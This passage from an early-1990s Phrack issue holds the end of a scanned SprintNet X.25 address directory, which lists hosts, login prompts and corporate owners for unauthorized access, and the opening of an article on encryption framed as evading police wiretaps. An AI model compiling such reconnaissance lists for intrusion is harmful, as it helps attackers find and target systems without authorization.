- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 716 50
- 716 140
- 716 141 *
- 716 232 TSO Bausch and Lomb Data Center
- 716 233 TSO Bausch and Lomb Data Center
- 716 234 TSO B + L DATA CENTER SERVICES
- 716 235 TSO B + L DATA CENTER SERVICES
- 716 236 TSO B + L DATA CENTER SERVICES
- 716 237 TSO B + L DATA CENTER SERVICES
- 716 238 TSO B + L DATA CENTER SERVICES
- 716 239 TSO B + L DATA CENTER SERVICES
- 716 240 TSO B + L DATA CENTER SERVICES
- 716 241 TSO B + L DATA CENTER SERVICES
- 716 242 TSO B + L DATA CENTER SERVICES
- 716 603 TSO B + L DATA CENTER SERVICES
- 716 605 TSO B + L DATA CENTER SERVICES
-
-
-
-
- 717 - Pennsylvania Scanned: [0 - 500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 717 24 *
- 717 31
- 717 32 *
- 717 33 *
- 717 34 *
- 717 44
- 717 45 VOS (use "list_users")
- 717 46 VOS
- 717 47 Woolworth Management Information Center X.25
- 717 48 Woolworth Management Information Center X.25
- 717 51 Woolworth Management Information Center Multi-System
- 717 54 $TM/ID: (Sprint Address Directory)
- 717 55 $TM/ID:
- 717 56 $TM/ID:
- 717 150 *
- 717 160 *
- 717 161 *
- 717 162 *
- 717 163 *
- 717 234 $ HP-3000 hello field.support
- 717 242 $
- 717 243 CONNECTED TO PACKET/400
-
-
-
-
- 747 - Boeing Scanned: [N/A]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 747 Note: All addresses in this prefix pass through a network
- security validator. I was unable to get passed it and
- unable to scan this prefix.
-
- Network validations as follows:
-
- ENTER USERID>
- ENTER PASSWORD>
- ENTER SERVICE NAME>
- INVALID USER IDENTIFICATION
-
- After too many attempts, you get this cheerful message:
-
- NOTICE!!! This is a private network. It is
- restricted to authorized users only. If you do
- not have authorization, you are warned to
- disconnect at once. Actual or attempted use,
- access, communication or examination by
- unauthorized persons will result in criminal
- and civil prosecution to the full extent of
- the law.
-
- If you require assistance in the use of this
- network or access to this network, please call:
- 206-865-7168
- if no answer 206-234-0911
-
-
-
-
-
-
- 755 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 755 1001 $ Prime
- 755 1002 $ Prime
- 755 1003 $ Prime
- 755 1004 $ Prime
- 755 1012 $ MHP201A IUX0306 APPLICATION:
- 755 1014 $ MHP201A LUX0502 APPLICATION:
- 755 1020 $
- 755 1023 $ MHP201A ITVG0182 APPLICATION:
- 755 1025 $ MHP201A ITVG0182 APPLICATION:
-
-
-
-
- 757 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 757 120 (echo)
- 757 126 MSG10-RJRT TERMINAL-ID:GSSCXB61 IS NOW IN SESSION
-
-
-
-
- 784 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 784 11000 $ Operator:
-
-
-
-
-
- 787 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 787 0 Prime
- 787 1 Prime
- 787 2 Prime
- 787 10001$
- 787 50001 USER ID--> (diverted for network validation)
- 787 50002$ Enter profile ID:
- 787 50003$
- 787 50005
- 787 50006$
- 787 70001
- 787 70002$
- 787 90001 Prime
- 787 90003$
- 787 90006 Prime PRIMENET 23.2.0v.PSWI STH-A
- 787 90007$
- 787 90008 CRYPTO ENTER "IDX" OR "ID" AND USER ID -->
- 787 90012
- 787 90014 VAX/VMS
- 787 90015$ USER ID-->
- 787 90016$
- 787 90018$
- 787 90023$
- 787 90025$ VAX/VMS V{lkommen...
- 787 90026$ access barred
-
-
-
-
- 789 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 789 11000 Prime
-
-
-
-
- 801 - Utah Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 801 25 Wasatch System.
- 801 26 Wasatch System.
- 801 27 Wasatch System.
- 801 54 $ VAX/VMS WELCOME TO SOLO - Unathorized use prohibited
- 801 250 ID?>
- 801 260
- 801 360 *
- 801 362
-
-
-
-
- 804 - Virginia Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 804 35 VAX/VMS
- 804 50 *
- 804 153
- 804 241 $ CONNECTED TO PACKET/74
- 804 242 *
- 804 243 *
- 804 244 *
- 804 245 *
- 804 256 CONNECTED TO PACKET/94
- 804 261 *
- 804 263 *
- 804 264 *
-
-
-
-
- 805 - California Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 805 50 VAX/VMS
- 805 51 VAX/VMS
- 805 52 VAX/VMS
- 805 150 Prime PRIMENET 22.0.1 MBM
- 805 230 $
-
-
-
-
- 810 - unknown Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 810 26 *
-
-
-
-
- 811 - unknown Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 811 13.12 *
- 811 13.16 Unix/SysV
- 811 15 *
- 811 17 $ HP-3000
- 811 21 $ Unix
- 811 22 $ Unix
- 811 24 $ Unix
- 811 25 TACL 1>
- 811 27.18 Unix/SysV
- 811 27.19 Unix/SysV
- 811 43.14 Unix/SysV
- 811 43.15 Unix/SysV
- 811 67
- 811 68
- 811 76.18 Unix/SysV Highlands VMS A login:
- 811 76.19 DACS1 (try 'help' - tons of cmds available)
- 811 84.19 * stat==STATUS STATISTICS?
- 811 85.2 *
- 811 141
- 811 142
- 811 150.10 *
- 811 315
- 811 316
- 811 411 MHP201A UEVT20U0
- 811 412 BA
- 811 413 @@
- 811 414 @@
- 811 415
-
-
-
-
- 813 - Florida Scanned: [0 - 1000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 813 20 *
- 813 21 *
- 813 48 *
- 813 52 $ Price Waterhouse
- 813 53 *
- 813 55 $ Price Waterhouse
- 813 59 $ Price Waterhouse National Admin Center
- 813 73 VM/CMS
- 813 74 $$ 4200 MODEL:
- 813 124 *
- 813 138 *
- 813 143A IBM Information Services.
- 813 147A IBM Information Services.
- 813 149 *
- 813 151 $ Price Waterhouse
- 813 153 *
- 813 154 *
- 813 172A IBM Information Services.
- 813 174A IBM Information Services, Information Network
- 813 237 *
- 813 240
- 813 248
- 813 261 *
- 813 266A IBM Information Services.
- 813 267A IBM Information Services.
- 813 269 VAX/VMS
- 813 270 VAX/VMS
- 813 271 Access Code:
- 813 272 Prime
- 813 277 U#=
- 813 330 *
- 813 333
- 813 352
- 813 358 USER ID
- 813 377
- 813 433 USER ID
- 813 434 USER ID
- 813 436 U#=
- 813 438 VAX/VMS
- 813 450
- 813 456 USER ID
- 813 457 USER ID
- 813 458 USER ID
- 813 459 USER ID
- 813 460 USER ID
- 813 461 USER ID
- 813 465 USER ID
- 813 466 USER ID
- 813 467 USER ID
- 813 468 USER ID
- 813 469 USER ID
- 813 470 USER ID
- 813 471 USER ID
- 813 472 USER ID
- 813 660
- 813 1330 *
- 813 1340 *
-
-
-
-
- 814 - Pennsylvania Scanned: [0 - 200]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 814 50 Prime PRIMENET 23.2.0.R39 SYSA
- 814 130 *
-
-
-
-
- 816 - Missouri Scanned: [0 - 1000 & various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 816 31 *
- 816 36
- 816 179 *
- 816 231 VAX/VMS
- 816 237 VAX/VMS
- 816 238 VAX/VMS
- 816 258 *
- 816 259 *
- 816 341
- 816 356 *
- 816 358 CONNECTED TO PACKET/94
- 816 359 CONNECTED TO PACKET/94
- 816 364 *
- 816 434
- 816 442 *
- 816 444 *
- 816 447 *
- 816 450 VAX/VMS
- 816 455
- 816 456
- 816 462 *
- 816 479 *
- 816 1041 $ (echo)
- 816 1042 $
- 816 1045 $
- 816 1046 $
- 816 1059 *
- 816 1058 *
- 816 1300 Major BBS WELCOME TO THE OASIS BBS - NODE 1
- 816 90031*
- 816 90032*
- 816 90038
- 816 90042 VAX/VMS #3MRPGWY
-
-
-
-
- 818 - California Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 818 21 *
- 818 30 *
-
-
-
-
- 834 - unknown Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 834 10003 VAX/VMS
- 834 10004 VAX/VMS
- 834 10005 VAX/VMS
- 834 10006 VAX/VMS
- 834 10007 VAX/VMS
- 834 10050 through 10099 are all VAXes
- 834 10100 Unix BIX -- ttyx1c, 34101 (Byte Information eXchange)
- 834 10101 through 10999 are all VAXes
- 834 20005 Prime PRIMENET 20.2.7 IREX
- 834 20009 MHP1201I TERMINAL CONNECTED TO PACKET/400
- 834 20201 (no response)
- 834 20202
- 834 20203
- 834 20204
- 834 20205
-
-
-
-
- 840-849 - unknwon Scanned:[N/A]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 840 Note: All these prefixes except 845 pass through Sprint's
- 841 TAMS Network validation. I was unable to get passed this
- 842 to scan. These addresses are only left in for the sake of
- 843 completeness.
- 844
- 845 * 845 seems to be disabled.
- 846
- 847 Network validation as follows:
- 848
- 849 YOUR CALL HAS BEEN DIVERTED FOR NETWORK USER VALIDATION.
- USER ID :
- PASSWORD :
- BH:INVALID USER ID OR PASSWORD.
-
-
-
-
-
- 890-895 - unknown Scanned:[N/A]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 890 $ Note: none of these addresses accept collect connections,
- 891 $ and all of them pass through some sort of network
- 892 $ validation. I was unable to get past this, and scan
- 893 $ them. These are only left in for the sake of completeness.
- 894 $
- 895 $ Network validation as follows:
-
- ADTN USER ID:
- ADTN PASSWORD:
-
-
-
-
- 909 - SprintNet Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 909 3 $ SprintNet Pad
- 909 6
- 909 8 Prime
- 909 9 Prime
- 909 10 Prime
- 909 12 Prime
- 909 13
- 909 14 SprintNet Pad
- 909 18
- 909 18.11 DJ
- 909 18.13 CARL
- 909 18.14 APPLE
- 909 18.15 GTEES
- 909 18.16 SONIC
- 909 18.17 NLM
- 909 18.18 ECSBBDS
- 909 18.19 ECSDIRE
- 909 18.20 ECSDREV
- 909 18.22 PLANETM
- 909 18.23 PLANDIR
- 909 18.24 SCANDIR
- 909 18.25 SCANECS
- 909 18.26 GRASSRT
- 909 18.27 GABST
- 909 18.28 INPLAND
- 909 18.29 INPLANM
- 909 18.30 ECHO
- 909 18.31 FARS
- 909 18.33 ACTB
- 909 18.34 OAG
- 909 18.35 CAPLANM
- 909 18.38 PLANPBB
- 909 18.39 DOAG
- 909 18.40 ACSDB
- 909 18.41 TOP
- 909 18.42 PAGES
- 909 18.43 CHEMJOB
- 909 18.44 OHPLANM
- 909 18.45 OHPLAND
- 909 18.46 ILPLANM
- 909 18.47 ILPLAND
- 909 18.48 GWN
- 909 18.49 CHEMREF
- 909 18.50 BOREAL
- 909 18.51 COMPETE
- 909 18.52 SAMI
- 909 18.53 UTINFO
- 909 18.54 KWIC
- 909 18.55 GRAD
- 909 18.56 SYM
- 909 18.57 CONDO
- 909 18.58 ISTHMUS
- 909 18.59 NETWRKS
- 909 18.70 PLANOSA
- 909 18.71 GROUP
- 909 18.72 CMADR
- 909 18.73 NEWS
- 909 18.74 IEEEDB
- 909 18.75 XDATA
- 909 18.76 LOCAL
- 909 18.77 CAPLAND
- 909 18.78 ERC
- 909 18.79 SEAGRAN
- 909 18.80 NSSDC
- 909 18.83 COLD
- 909 18.84 GEOREF
- 909 18.85 NTIS
- 909 18.86 CURRENT
- 909 18.87 SABRE
- 909 18.88 ARCTIC
- 909 18.89 ECS
- 909 23 Prime
- 909 26 Prime
- 909 27 Prime
- 909 33 $ (not from this DTE)
- 909 38 User name?
- 909 39 Prime
- 909 44 Prime
- 909 49 USER ID
- 909 51 Your call cannot be completed (unknown destination).
- 909 52 Your call cannot be completed (unknown destination).
- 909 53 User name?
- 909 54
- 909 55 USER ID
- 909 58
- 909 58
- 909 62 User name?
- 909 63 User name?
- 909 65 User name?
- 909 77 Prime
- 909 79 MHP201A XLU76001 * VERSION 6.1.3 *
- 909 82 Prime
- 909 90 Prime
- 909 92 Prime
- 909 94 Prime
- 909 95 Prime
- 909 97 Prime
- 909 98 Prime Please login [CMOS]:
- 909 100 Prime
- 909 103 TELENET ASYNC TO 3270 SERVICE
- 909 104 TELENET ASYNC TO 3270 SERVICE
- 909 107 *
- 909 116 Prime
- 909 117 Prime
- 909 121
- 909 123 User name?
- 909 125
- 909 126
- 909 130 Prime
- 909 131 Prime
- 909 136 Prime
- 909 137 Prime
- 909 139 Prime
- 909 140 TACL 1>
- 909 141 Prime
- 909 143 Prime
- 909 144 Prime
- 909 146 User name?
- 909 147 User name?
- 909 148 User name?
- 909 149 User name?
- 909 151
- 909 153 TACL 1>
- 909 155 User name?
- 909 158 User name?
- 909 159 User name?
- 909 160 User name?
- 909 161 User name?
- 909 162 User name?
- 909 165 User name?
- 909 167 TACL 1>
- 909 168 User name?
- 909 171 TELENET ASYNC TO 3270 SERVICE
- 909 172 TELENET ASYNC TO 3270 SERVICE
- 909 173 User name?
- 909 176 Prime
- 909 178 USER ID
- 909 179 USER ID
- 909 184 Prime
- 909 205 Prime
- 909 206 Prime
- 909 212 Prime Please login [S212]:
- 909 235 Prime Please Login [S235]:
- 909 236 Prime Please Login [S235]:
- 909 239 Prime
- 909 302 Prime Please login [S302]:
- 909 331 *
- 909 352 !LOAD AND FUNCTION TESTER
- 909 353 !LOAD AND FUNCTION TESTER
- 909 354 !LOAD AND FUNCTION TESTER
- 909 355 !LOAD AND FUNCTION TESTER
- 909 400 User name?
- 909 401 User name?
- 909 402 Unix DG/UX Release 4.31. AViiON (tpx1b)
- 909 403 User name?
- 909 404 User name?
- 909 406 User name?
- 909 407 User name?
- 909 408 User name?
- 909 409 User name?
- 909 500 Prime
- 909 501 Prime
- 909 502 Prime
- 909 503 Prime
- 909 555 Unix DG/UX (joker)
- 909 615 Prime
- 909 623 User Name?
- 909 626 User name?
- 909 627 User name?
- 909 628 User name?
- 909 629 User name?
- 909 630 User name?
- 909 631 PC-Pursuit BBS
- 909 640 User name?
- 909 641 User name?
- 909 642 User name?
- 909 643 User name?
- 909 644 Unix X.29 Terminal Service (courts)
- 909 645 User name?
- 909 649
- 909 650 User name?
- 909 651 User name?
- 909 652 Unix X.29 Terminal Service (courts)
- 909 656 REJECTING 00 00
- 909 661
- 909 751 SPRINT EASTERN REGION NETWORK
- 909 761 User name?
- 909 762 User name?
- 909 763 User name?
- 909 764 TELENET ASYNC TO 3270 SERVICE
- 909 767 SPRINT EASTERN REGION NETWORK
- 909 769
- 909 770 Unix X.29 Terminal Service (fan2)
- 909 772 Prime
- 909 776 Unix DG/UX Release 4.31. AViiON (tpx1b)
- 909 777 TELENET ASYNC TO 3270 SERVICE
- 909 779 TELENET ASYNC TO 3270 SERVICE
- 909 784 TELENET ASYNC TO 3270 SERVICE
- 909 798 Prime Please login [S798]
- 909 800 User name? help
- 909 801 Unix DG/UX Release 4.31. AViiON (tpx1b)
- 909 805 User name?
- 909 806 Your call cannot be completed (unknown destination).
- 909 811 Unix DG/UX Release 4.31. AViiON (tpx1b)
- 909 813 User name?
- 909 814 User name?
- 909 816 User name?
- 909 817 User name?
- 909 818 User name?
- 909 819 User name?
- 909 822 User name?
- 909 823 User name?
- 909 824 User name?
- 909 828 User name?
- 909 830 User name?
- 909 831 User name?
- 909 840 User name?
- 909 841 User name?
- 909 842 User name?
- 909 843 User name?
- 909 844 User name?
- 909 845 User name?
- 909 846 Your call cannot be completed (unknown destination).
- 909 847
- 909 849 Unix X.29 Terminal Service
- 909 900 Prime
- 909 901 Prime
- 909 2070 Prime Please Login [S235]:
- 909 2075 Prime Please login [S2075]:
- 909 2080 Prime Please login [CMOS]:
- 909 2086 Unix DG/UX (iceman)
- 909 2090 Prime Please login [S798]
- 909 2091 Prime
- 909 2092 Prime
-
-
-
-
- 910 - SprintNet Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 910 100 Prime
- 910 101 Prime
- 910 200 Prime
- 910 400 Prime
- 910 401 Prime
- 910 500 Prime
- 910 501 Prime
- 910 503 Prime Please Login.
- 910 504 Prime Please Login.
- 910 600 Prime
- 910 601 Prime
-
-
-
-
- 920 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 920 102 INSTITUTE OF NUCLEAR POWER OPERATIONS
- 920 103 INSTITUTE OF NUCLEAR POWER OPERATIONS
- 920 104 You are now connected to the computer. (16)
- 920 105 INSTITUTE OF NUCLEAR POWER OPERATIONS
- 920 106 You are now connected to the computer. (16)
- 920 107 You are now connected to the computer. (16)
-
-
-
-
- 933 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 933 10000 Unix DG/UX Release 4.32. AViiON (atlantic)
- Note: all other addr's after 1000 = BUSY!
-
-
-
-
- Mnemonic Addresses Scanned: N/A
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- APPLE Unix 4.3 BSD UNIX (apple.com)
- BCS ACCESS TO THIS ADDRESS NOT PERMITTED.
- BETA (hangs)
- BIX Unix Welcome to BIX -- ttyx11c, 34101
- BRS ENTER BRS PASSWORD
- CCC02 GOOD DAY, PLEASE ENTER YOUR ID NUMBER
- CCC03 GOOD DAY, PLEASE ENTER YOUR ID NUMBER
- CLARIONET Major BBS Userid : new
- CMS enter a for astra
- COM NOT REACHABLE 05 E6
- CONTEL GTE Contel DUAT System (airplane stuff)
- COS enter a for astra
- D41 Prime Primecom Network 19.4Q.111 System 41
- D42 Prime Primecom Network 19.4Q.111 System 42
- D43 Prime Primecom Network 19.4Q.111 System 43
- D44 Prime Primecom Network 19.4Q.111 System 44
- D46 Prime Primecom Network 19.4Q.111 System 46
- D52 Prime Primecom Network 19.4Q.111 System 52
- D56 Prime Primecom Network 18.4Y System 56
- D57 Prime Primecom Network 19.4Q.111 System 57
- D61 Prime Primecom Network 19.4Q.111 System 31
- D64 Prime Primecom Network 19.4Q.111 System 64
- DELPHI VAX/VMS Username:
- DIALOG Dialog Information Services
- DIR
- DOW WHAT SERVICE PLEASE????
- DUAT GTE Contel DUAT System
- DUNS Dunsnet (D&B)
- EIES Unix HP-UX ciathp A.B7.00 U 9000/835
- FAR Please enter your ID number:
- FED REJECTING 00 E8
- GOLD $
- GTEMAIL SprintNet Directory
- INFO Your call cannot be completed (unknown destination).
- IRIS NOT REACHABLE 05 E6
- ITI VAX/VMS Usuario :
- KIS ACCESS TO THIS ADDRESS NOT PERMITTED.
- LEXIS Lexis and Nexis
- MAIL SprintNet Directory
- META Unix tmn!login:
- MMM USER ID
- MUNI ACCESS TO THIS ADDRESS NOT PERMITTED.
- NAS PLEASE ENTER LOGIN
- NASA
- NET Prime NewsNet
- NETX SNPBBS Telenet's NETXBBS (Old PCP/New Buisnesscall bbs?)
- NLM PLEASE ENTER LOGIN
- NSF ACCESS TO THIS ADDRESS NOT PERMITTED.
- OAG PLEASE ENTER SUBSCRIBERID;PASSWORD
- OLS NOT OPERATING 09 00
- ONLINE VOS Please login
- ORBIT ENTER ORBIT USERID
- PDN Major BBS Public Data Network (BBS) User-ID? new
- PLASPEC Unix
- PLAY $
- PORTAL Portal Communications Company.
- PSINET $
- PURSUIT SNPBBS PC-Pursuit BBS
- QUICK PLEASE ENTER YOUR BMG USERID :
- SIS NOS CDCNET
- SPR REMOTE PROCEDURE ERROR 11 51
- STK1 ACCESS TO THIS ADDRESS NOT PERMITTED.
- STK2 ACCESS TO THIS ADDRESS NOT PERMITTED.
- STK3 ACCESS TO THIS ADDRESS NOT PERMITTED.
- TELEX User name?
- TELEMAIL User name?
- TPE $ Major BBS (adult chat/bbs) Member-ID? new
- TRACK $
- TRW User name?
- UNISYS ACCESS TO THIS ADDRESS NOT PERMITTED.
- USIBM
- VONS USER ID
- VUTEXT VU/TEXT
- WARNER ACCESS TO THIS ADDRESS NOT PERMITTED.
- WESTLAW ENTER ID
- ZIFF **** Invalid sign-on, please try again ****
-
-
-
- PC-Pursuit Dialers
- ~~~~~~~~~~~~~~~~~~
- Usage: C D/<dialer>/<baud>,<nui>,<password> (Note: bauds are 3, 12, or 24)
-
- NPA Dialer
- ~~ ~~~~~~
- 313 MIAAR
- 404 GAATL
- 512 TXAUS
- 617 MABOS
- 312 ILCHI
- 708 ILCHI (1-708+num)
- 815 ILCHI (1-815+num)
- 216 OHCLE
- 714 CACOL
- 614 OHCOL
- 214 TXDAL
- 817 TXDAL (817+num)
- 303 CODEN
- 313 MIDET
- 818 CAGLE
- 310 CAGLE (1-310+num)
- 213 CAGLE (1-213+num)
- 203 CTHAR
- 516 NYHEM
- 713 TXHOU
- 317 ININ12
- 317 ININ24
- 816 MOKCI
- 913 MOKCI
- 213 CALAN
- 310 CALAN (1-310+num)
- 818 CALAN (1-818+num)
- 305 FLMIA
- 414 WIMIL
- 612 MNMIN
- 201 NJNEW
- 908 NJNEW (1-908+num)
- 901 TNMEM
- 601 TNMEM (1-601+num)
- 908 NJNBR
- 201 NJNBR (1-201+num)
- 504 LANOR
- 212 NYNYO
- 516 NYNYO (1-516+num)
- 718 NYNYO (1-718+num)
- 914 NYNYO (1-914+num)
- 415 CAOAK (1-415+num)
- 510 CAOAK
- 407 FLORL
- 415 CAPAL
- 408 CAPAL (1-408+num)
- 510 CAPAL (1-510+num)
- 215 PAPHI
- 602 AZPHO
- 412 PAPIT
- 503 ORPOR
- 919 NCRTP
- 916 CASAC
- 801 UTSLC
- 619 CASDI
- 415 CASFA
- 510 CASFA (1-510+num)
- 408 CASJO
- 510 CASJO (1-510+num)
- 415 CASJO (1-415+num)
- 714 CASAN
- 310 CASAN (1-310+num)
- 213 CASAN (1-213+num)
- 206 WASEA
- 314 MOSLO
- 618 MOSLO (1-618+num)
- 813 FLTAM
- 202 DCWAS
- 703 DCWAS (1-703+num)
- 301 DCWAS (1-301+num)
-
-
-
- ************************End SprintNet Directory 92**************************
-
- -Sky
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 11 of 14
-
-
- ###################################################
- # The Paranoid Schizophrenics Guide to Encryption #
- # (or How to Avoid Getting Tapped and Raided) #
- ###################################################
-
- Written by The Racketeer of
- The /-/ellfire Club
-
-
- The purpose of this file is to explain the why and the how of Data
- Encryption, with a brief description of the future of computer security,
- TEMPEST.
-
- At the time of this issue's release, two of the more modern software
- packages use encryption methods covered in this article, so exercise some of
- your neurons and check into newer releases if they are available. Methods
- described in this file use PGP, covering an implementation of Phil Zimmermann's
- RSA variant, and the MDC and IDEA conventional encryption techniques by using
- PGP and HPACK.
-
- --------------------
- WHY DATA ENCRYPTION?
- --------------------
-
- This isn't exactly the typical topic discussed by me in Phrack.
- However, the importance of knowing encryption is necessary when dealing with
- any quasi-legal computer activity. I was planning on starting my series on
- hacking Novell Networks (so non-Internet users can have something to do), but
- recent events have caused me to change my mind and, instead of showing people
- how to get into more trouble (well, okay, there is plenty of that in this file
- too, since you're going to be working with contraband software), I've opted
- instead to show people how to protect themselves from the long arm of the Law.
-
- Why all this concern?
-
- Relatively recently, The Masters of Deception (MoD) were raided by
- various federal agencies and were accused of several crimes. The crimes they
- did commit will doubtlessly cause more mandates, making the already
- too-outrageous penalties even worse.
-
- "So?" you might ask. The MoD weren't exactly friends of mine. In fact,
- quite the contrary. But unlike many of the hackers whom I dealt with in the
- "final days" prior to their arrest, I bitterly protested any action against the
- MoD. Admittedly, I followed the episode from the beginning to the end, and the
- moral arguments were enough to rip the "Hacker World" to pieces. But these
- moral issues are done, the past behind most of us. It is now time to examine
- the aftermath of the bust.
-
- According to the officials in charge of the investigation against MoD
- members, telephone taps were used to gain evidence against members
- successfully. All data going in and out of their house was monitored and all
- voice communications were monitored, especially between members.
-
- So, how do you make a line secure? The party line answer is use of
- effective encryption methods.
-
- Federal investigative agencies are currently pushing for more
- technological research into the issue of computer security. All of the popular
- techniques which are being used by hackers today are being used by the
- government's R&D departments.
-
- Over the course of the last 5 years, I've watched as the U.S.
- Government went from a task force of nearly nil all the way to a powerful
- marauder. Their mission? Unclear. Regardless, the research being
- accomplished by federally-funded projects dealing with the issues of computer
- security are escalating. I've personally joined and examined many such
- conferences and have carefully examined the issues. Many of these issues will
- become future Phrack articles which I'll write. Others, such as limited-life
- semiconductors and deliberate telephone line noise sabotage caused by ACK
- packet detections in order to drive telecommunication costs higher, are sadly
- unpreventable problems of the future which won't be cured by simple awareness
- of the problem.
-
- They have different names -- Computer Emergency Response Team (CERT),
- Computer Assisted Security Investigative Analysis Tool (FBI's CASIAT), the
- Secret Service's Computer Fraud Division, or the National Computer Security
- Center (NSA's NCSC). Scores of other groups exist for every network, even
- every operating system. Their goal isn't necessarily to catch hackers; their
- goal is to acquire information about the act of hacking itself until it is no
- longer is a problem. Encryption stands in the way.
-
- Computer Security is literally so VAST a concept that, once a person
- awakens to low-level computer mechanics, it becomes nearly impossible to
- prevent that person from gaining unauthorized access to machines. This is
- somewhat contradictory to the "it's all social engineering" concept which we
- have been hearing about on Nightline and in the papers. If you can't snag them
- one way though, you can get them another -- the fact is that computers are
- still too damn vulnerable these days to traditional hacking techniques.
-
- Because of the ease of breaking through security, it becomes very
- difficult to actually create an effective way to protect yourself from any form
- of computer hacking. Look at piracy: they've tried every trick in the book to
- protect software and, so far, the only success they have had was writing
- software that sucked so much nobody wanted a copy.
-
- Furthermore, totally non-CPU related attacks are taking place. The
- passing of Anti-TEMPEST Protection Laws which prevent homes from owning
- computers that don't give off RF emissions has made it possible for any Joe
- with a few semesters of electrical engineering knowledge to rig together a
- device that can read what's on your computer monitor.
-
- Therefore:
-
- Q: How does a person protect their own computer from getting hacked?
-
- A: You pretty much can't.
-
- I've memorized so many ways to bypass computer security that I can
- rattle them off in pyramid levels. If a computer is not even connected to a
- network or phone line, people can watch every keystroke typed and everything
- displayed on the screen.
-
- Why aren't the Fedz using these techniques RIGHT NOW?
-
- I can't say they are not. However, a little research into TEMPEST
- technology resulted in a pretty blunt fact:
-
- There are too many computer components to scan accurately. Not the
- monitor, oh no! You're pretty much fucked there. But accessories for input
- and output, such as printers, sound cards, scanners, disk drives, and so
- forth...the possibility of parallel CPU TEMPEST technology exists, but there are
- more CPU types than any mobile unit could possibly use accurately.
-
- Keyboards are currently manufactured by IBM, Compaq, Dell, Northgate,
- Mitsuma (bleah), Fujitsu, Gateway, Focus, Chichony, Omni, Tandy, Apple, Sun,
- Packard-Bell (may they rot in hell), Next, Prime, Digital, Unisys, Sony,
- Hewlett-Packard, AT&T, and a scattering of hundreds of lesser companies. Each
- of these keyboards have custom models, programmable models, 100+ key and < 100
- key models, different connectors, different interpreters, and different levels
- of cable shielding.
-
- For the IBM compatible alone, patents are owned on multiple keyboard
- pin connectors, such as those for OS/2 and Tandy, as well as the fact that the
- ISA chipsets are nearly as diverse as the hundreds of manufacturers of
- motherboards. Because of lowest-bid practices, there can be no certainty of
- any particular connection -- especially when you are trying to monitor a
- computer you've never actually seen!
-
- In short -- it costs too much for the TEMPEST device to be mobile and
- to be able to detect keystrokes from a "standard" keyboard, mostly because
- keyboards aren't "standard" enough! In fact, the only real standard which I
- can tell exists on regular computers is the fact that monitors still use good
- old CRT technology.
-
- Arguments against this include the fact that most of the available PC
- computers use standard DIN connectors which means that MOST of the keyboards
- could be examined. Furthermore, these keyboards are traditionally serial
- connections using highly vulnerable wire (see Appendix B).
-
- Once again, I raise the defense that keyboard cables are traditionally
- the most heavily shielded (mine is nearly 1/4 inch thick) and therefore falls
- back on the question of how accurate a TEMPEST device which is portable can be,
- and if it is cost effective enough to use against hackers. Further viewpoints
- and TEMPEST overview can be seen in Appendix B.
-
- As a result, we have opened up the possibility for protection from
- outside interference for our computer systems. Because any DECENT encryption
